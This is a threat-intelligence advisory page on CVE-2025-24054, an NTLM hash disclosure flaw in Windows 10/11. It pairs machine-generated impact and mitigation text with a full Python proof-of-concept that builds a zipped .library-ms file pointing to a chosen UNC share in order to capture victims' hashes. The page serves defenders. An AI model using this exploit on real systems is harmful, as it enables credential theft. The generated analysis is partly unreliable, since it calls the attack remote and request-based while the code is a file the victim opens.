windows 10/11 - NTLM Hash Disclosure Spoofing
windows 10/11 - NTLM Hash Disclosure Spoofing
AI Analysis
Technical Summary
The NTLM Hash Disclosure Spoofing exploit targets Windows 10 and 11 operating systems by abusing vulnerabilities in the NTLM authentication protocol. NTLM (NT LAN Manager) is a challenge-response authentication protocol used in Windows environments, which relies on hashed credentials for authentication. This exploit enables an attacker to remotely spoof authentication requests and capture NTLM hashes from targeted systems. By obtaining these hashes, attackers can perform pass-the-hash attacks or offline cracking to escalate privileges or move laterally within a network. The exploit is delivered remotely, does not require prior authentication, and involves sending crafted requests that trick the system into disclosing hashed credentials. The availability of Python exploit code lowers the barrier for exploitation, making it accessible to a broader range of attackers. Although no official patches or mitigations have been published yet, the exploit highlights inherent weaknesses in NTLM and the need for organizations to adopt stronger authentication mechanisms. The lack of known exploits in the wild suggests this is a newly disclosed vulnerability, but the medium severity rating reflects the significant risk posed by credential theft in enterprise environments.
Potential Impact
If successfully exploited, this vulnerability can lead to unauthorized disclosure of NTLM hashes, compromising the confidentiality and integrity of user credentials. Attackers can leverage stolen hashes to impersonate legitimate users, escalate privileges, and move laterally across networks, potentially gaining access to sensitive systems and data. This can result in data breaches, disruption of business operations, and increased risk of ransomware or other malware deployment. The remote nature of the exploit increases the attack surface, especially for organizations with exposed Windows systems. However, the exploit does not directly cause denial of service or system crashes, limiting its impact on availability. Overall, the threat poses a significant risk to organizations relying on NTLM authentication without additional protections such as multifactor authentication or network segmentation.
Mitigation Recommendations
Organizations should prioritize transitioning away from NTLM authentication to more secure protocols like Kerberos where possible. Implementing network-level protections such as SMB signing and enforcing SMB encryption can reduce the risk of hash interception. Deploying multifactor authentication (MFA) significantly mitigates the impact of compromised hashes by requiring additional verification factors. Monitoring network traffic for unusual NTLM authentication requests and employing intrusion detection systems can help detect exploitation attempts. Applying the latest Windows security updates and patches as they become available is critical. Additionally, restricting exposure of Windows systems to untrusted networks and segmenting critical assets can limit attacker movement. Employing credential guard features available in Windows 10/11 can protect NTLM hashes in memory. Finally, educating users and administrators about the risks of NTLM and enforcing strong password policies will further reduce exploitation likelihood.
Affected Countries
United States, United Kingdom, Germany, France, Canada, Australia, Japan, South Korea, India, Brazil
Indicators of Compromise
- exploit-code: # Exploit Title: windows 10/11 - NTLM Hash Disclosure Spoofing # Date: 2025-10-06 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://www.microsoft.com # Software Link: N/A # Version: Not applicable (this is a generic Windows library file behavior) # Tested on: Windows 10 (x64) / Windows 11 (x64) (lab environment) # CVE: CVE-2025-24054 # Description: # A proof-of-concept that generates a .library-ms XML file pointing to a network # share (UNC). When opened/imported on Windows, the library points to the specified # UNC path. # # Notes: # - This PoC is provided for responsible disclosure only. Do not test against # live/production websites or networks without explicit written permission. # - Attach exactly one exploit file per email (this file). # - Include the .library-ms (or ZIP containing it) as an attachment, plus this header block. #!/usr/bin/env python3 import argparse import ipaddress import os import re import sys import tempfile import zipfile import shutil from pathlib import Path # Very small hostname check (keeps things simple) _HOSTNAME_RE = re.compile( r"^(?:[A-Za-z0-9](?:[A-Za-z0-9\-]{0,61}[A-Za-z0-9])?\.)*[A-Za-z0-9\-]{1,63}$" ) # simple sanitizer: allow only a limited charset for base filenames _FILENAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,128}$") def is_valid_target(value: str) -> bool: """ Return True if value looks like an IP address, a hostname, or a UNC path. This is intentionally permissive — it's only to catch obvious typos. """ if value.startswith("\\\\") or value.startswith("//"): # Minimal UNC sanity: ensure there's at least \\host\share (two components) parts = re.split(r"[\\/]+", value.strip("\\/")) return len(parts) >= 2 and all(parts[:2]) try: ipaddress.ip_address(value) return True except ValueError: pass if _HOSTNAME_RE.match(value): return True return False def build_library_xml(target: str) -> str: """ Build the XML content for the .library-ms file. If the user supplies a bare host/IP, the script uses a share called 'shared' (matching the original behavior). """ if target.startswith("\\\\") or target.startswith("//"): # normalize forward slashes to backslashes (if any) url = target.replace("/", "\\") else: url = f"\\\\{target}\\shared" # Return a plain, minimal XML structure (no additional payloads) return f"""<?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <searchConnectorDescriptionList> <searchConnectorDescription> <simpleLocation> <url>{url}</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription> """ def write_zip_with_lib(xml_content: str, lib_name: str, zip_path: Path) -> None: """ Write the XML to a temporary .library-ms file and add it into a zip. """ tmpdir = Path(tempfile.mkdtemp(prefix="libgen_")) try: tmp_lib = tmpdir / lib_name tmp_lib.write_text(xml_content, encoding="utf-8") with zipfile.ZipFile(zip_path, mode="w", compression=zipfile.ZIP_DEFLATED) as zf: # place the file at the root of the zip zf.write(tmp_lib, arcname=lib_name) finally: # robust cleanup try: shutil.rmtree(tmpdir) except Exception: pass def sanitize_basename(name: str) -> str: """ Ensure the provided base filename is a short safe token (no path separators). Raises ValueError on invalid names. """ if not name: raise ValueError("Empty filename") if os.path.sep in name or (os.path.altsep and os.path.altsep in name): raise ValueError("Filename must not contain path separators") if not _FILENAME_RE.match(name): raise ValueError( "Filename contains invalid characters. Allowed: letters, numbers, dot, underscore, hyphen" ) return name def main(): parser = argparse.ArgumentParser( description="Generate a .library-ms inside a zip (keep it responsible)." ) parser.add_argument( "--file", "-f", default=None, help="Base filename (without extension). If omitted, interactive prompt is used.", ) parser.add_argument( "--target", "-t", default=None, help="Target IP, hostname or UNC (e.g. 192.168.1.162 or \\\\host\\share).", ) parser.add_argument( "--zip", "-z", default="exploit.zip", help="Output zip filename (default: exploit.zip).", ) parser.add_argument( "--out", "-o", default=".", help="Output directory (default: current directory).", ) parser.add_argument( "--dry-run", action="store_true", help="Print the .library-ms content and exit without creating files.", ) parser.add_argument( "--force", action="store_true", help="Overwrite output zip if it already exists (use with care).", ) args = parser.parse_args() # Interactive fallback if needed if not args.file: try: args.file = input("Enter your file name (base, without extension): ").strip() except EOFError: print("No file name provided.", file=sys.stderr) sys.exit(1) if not args.target: try: args.target = input( "Enter IP or host (e.g. 192.168.1.162 or \\\\host\\share): " ).strip() except EOFError: print("No target provided.", file=sys.stderr) sys.exit(1) # sanitize filename try: safe_base = sanitize_basename(args.file) except ValueError as e: print(f"ERROR: invalid file name: {e}", file=sys.stderr) sys.exit(2) if not args.target or not is_valid_target(args.target): print( "ERROR: target does not look like a valid IP, hostname, or UNC path.", file=sys.stderr, ) sys.exit(2) lib_filename = f"{safe_base}.library-ms" xml = build_library_xml(args.target) # Dry-run: show the content and exit if args.dry_run: print("=== DRY RUN: .library-ms content ===") print(xml) print("=== END ===") print(f"(Would create {lib_filename} inside {args.zip} in {args.out})") return out_dir = Path(args.out).resolve() out_dir.mkdir(parents=True, exist_ok=True) zip_path = out_dir / args.zip if zip_path.exists() and not args.force: print( f"ERROR: {zip_path} already exists. Use --force to overwrite.", file=sys.stderr, ) sys.exit(3) # small reminder about authorization print("Reminder: run tests only against systems you are authorized to test.") write_zip_with_lib(xml, lib_filename, zip_path) print(f"Done. Created {zip_path} containing {lib_filename} -> points to {args.target}") if __name__ == "__main__": main()
windows 10/11 - NTLM Hash Disclosure Spoofing
Description
windows 10/11 - NTLM Hash Disclosure Spoofing
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The NTLM Hash Disclosure Spoofing exploit targets Windows 10 and 11 operating systems by abusing vulnerabilities in the NTLM authentication protocol. NTLM (NT LAN Manager) is a challenge-response authentication protocol used in Windows environments, which relies on hashed credentials for authentication. This exploit enables an attacker to remotely spoof authentication requests and capture NTLM hashes from targeted systems. By obtaining these hashes, attackers can perform pass-the-hash attacks or offline cracking to escalate privileges or move laterally within a network. The exploit is delivered remotely, does not require prior authentication, and involves sending crafted requests that trick the system into disclosing hashed credentials. The availability of Python exploit code lowers the barrier for exploitation, making it accessible to a broader range of attackers. Although no official patches or mitigations have been published yet, the exploit highlights inherent weaknesses in NTLM and the need for organizations to adopt stronger authentication mechanisms. The lack of known exploits in the wild suggests this is a newly disclosed vulnerability, but the medium severity rating reflects the significant risk posed by credential theft in enterprise environments.
Potential Impact
If successfully exploited, this vulnerability can lead to unauthorized disclosure of NTLM hashes, compromising the confidentiality and integrity of user credentials. Attackers can leverage stolen hashes to impersonate legitimate users, escalate privileges, and move laterally across networks, potentially gaining access to sensitive systems and data. This can result in data breaches, disruption of business operations, and increased risk of ransomware or other malware deployment. The remote nature of the exploit increases the attack surface, especially for organizations with exposed Windows systems. However, the exploit does not directly cause denial of service or system crashes, limiting its impact on availability. Overall, the threat poses a significant risk to organizations relying on NTLM authentication without additional protections such as multifactor authentication or network segmentation.
Mitigation Recommendations
Organizations should prioritize transitioning away from NTLM authentication to more secure protocols like Kerberos where possible. Implementing network-level protections such as SMB signing and enforcing SMB encryption can reduce the risk of hash interception. Deploying multifactor authentication (MFA) significantly mitigates the impact of compromised hashes by requiring additional verification factors. Monitoring network traffic for unusual NTLM authentication requests and employing intrusion detection systems can help detect exploitation attempts. Applying the latest Windows security updates and patches as they become available is critical. Additionally, restricting exposure of Windows systems to untrusted networks and segmenting critical assets can limit attacker movement. Employing credential guard features available in Windows 10/11 can protect NTLM hashes in memory. Finally, educating users and administrators about the risks of NTLM and enforcing strong password policies will further reduce exploitation likelihood.
Technical Details
- Edb Id
- 52478
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for windows 10/11 - NTLM Hash Disclosure Spoofing
# Exploit Title: windows 10/11 - NTLM Hash Disclosure Spoofing # Date: 2025-10-06 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://www.microsoft.com # Software Link: N/A # Version: Not applicable (this is a generic Windows library file behavior) # Tested on: Windows 10 (x64) / Windows 11 (x64) (lab environment) # CVE: CVE-2025-24054 # Description: # A proof-of-concept that generates a .library-ms XML file pointing to a network # share (UNC). When opened/imported on Windows,... (6610 more characters)
Threat ID: 69845ddcf9fa50a62f0fd492
Added to database: 2/5/2026, 9:07:40 AM
Last enriched: 2/28/2026, 3:03:02 PM
Last updated: 3/24/2026, 12:42:37 AM
Views: 193
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.